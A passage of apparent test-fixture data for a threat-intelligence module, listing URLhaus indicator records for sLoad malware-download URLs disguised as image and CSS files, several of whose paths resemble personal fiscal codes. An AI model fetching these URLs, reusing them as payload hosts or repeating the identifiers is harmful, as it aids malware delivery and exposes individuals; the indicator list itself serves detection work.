"threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/CRSRRT61E15H501H/logo.png", + "threatintel.indicator.url.path": "/bella/CRSRRT61E15H501H/logo.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961484/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 23724, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:15.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://cxminute.com/minu/SMPMSM67P05F205U/it.jpg", + "threatintel.indicator.url.path": "/minu/SMPMSM67P05F205U/it.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961480/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 24094, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:13.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://univirtek.com/viro/SBNPQL78A24A783E/uk.png", + "threatintel.indicator.url.path": "/viro/SBNPQL78A24A783E/uk.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961481/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 24466, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:13.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://cxminute.com/minu/15578761007/maps.jpg", + "threatintel.indicator.url.path": "/minu/15578761007/maps.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961478/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 24833, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:10.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://univirtek.com/viro/03079590133/1x1.png", + "threatintel.indicator.url.path": "/viro/03079590133/1x1.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961479/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 25201, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:10.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/BNCLNR77T56M082U/it.gif", + "threatintel.indicator.url.path": "/ladi/BNCLNR77T56M082U/it.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961476/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 25579, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:45.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css", + "threatintel.indicator.url.path": "/minu/JNKMTJ64B29L424O/uk.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961477/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 25949, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:45.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/PGNMRA64S22I608Z/en.png", + "threatintel.indicator.url.path": "/bella/PGNMRA64S22I608Z/en.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961470/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 26336, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://cxminute.com/minu/RZKDRD77T23Z229T/logo.jpg", + "threatintel.indicator.url.path": "/minu/RZKDRD77T23Z229T/logo.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961471/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 26708, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "fhivelifestyle.online", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "fhivelifestyle.online", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://fhivelifestyle.online/nhbrwvdffsgt/adf/maps.jpg", + "threatintel.indicator.url.path": "/nhbrwvdffsgt/adf/maps.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961472/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 27093, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/05739900487/1x1.css", + "threatintel.indicator.url.path": "/bella/05739900487/1x1.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961473/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 27476, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/01767180597/map.css", + "threatintel.indicator.url.path": "/bella/01767180597/map.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961474/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 27859, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/BRNGRG55D21F394K/map.css", + "threatintel.indicator.url.path": "/bella/BRNGRG55D21F394K/map.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961475/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 28247, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://cxminute.com/minu/DLLTZN67L20L157J/1x1.css", + "threatintel.indicator.url.path": "/minu/DLLTZN67L20L157J/1x1.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961468/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 28618, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:38.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://cxminute.com/minu/08035410722/logo.jpg", + "threatintel.indicator.url.path": "/minu/08035410722/logo.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961469/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 28985, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:38.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/GRNZEI60M13G346L/en.css", + "threatintel.indicator.url.path": "/viro/GRNZEI60M13G346L/en.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961467/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 29357, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:13.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/03253350239/1x1.png", + "threatintel.indicator.url.path": "/leto/03253350239/1x1.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961464/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 29727, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:09.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/10582470158/uk.css", + "threatintel.indicator.url.path": "/ladi/10582470158/uk.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961465/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 30100, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:09.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/BTTLNZ68A56D325C/map.css", + "threatintel.indicator.url.path": "/ladi/BTTLNZ68A56D325C/map.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961466/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 30479, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:09.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/NNTLRT68P28A717L/en.jpg", + "threatintel.indicator.url.path": "/leto/NNTLRT68P28A717L/en.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961461/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 30853, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:08.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://univirtek.com/viro/CTTNDR89A19B149W/maps.png", + "threatintel.indicator.url.path": "/viro/CTTNDR89A19B149W/maps.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961462/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 31227, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:08.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://cxminute.com/minu/DRSNTN77B16I197U/logo.css", + "threatintel.indicator.url.path": "/minu/DRSNTN77B16I197U/logo.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961463/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 31599, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:08.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/02941830735/uk.css", + "threatintel.indicator.url.path": "/viro/02941830735/uk.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961458/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 31966, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:07.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/MNSGCM91A04G240K/it.css", + "threatintel.indicator.url.path": "/bella/MNSGCM91A04G240K/it.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961459/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 32353, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:07.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/03108100615/it.jpg", + "threatintel.indicator.url.path": "/ladi/03108100615/it.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961460/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 32726, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:07.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://cxminute.com/minu/PTACSM56A31F604X/en.png", + "threatintel.indicator.url.path": "/minu/PTACSM56A31F604X/en.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961455/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 33096, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:39.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://univirtek.com/viro/00183050368/en.gif", + "threatintel.indicator.url.path": "/viro/00183050368/en.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": 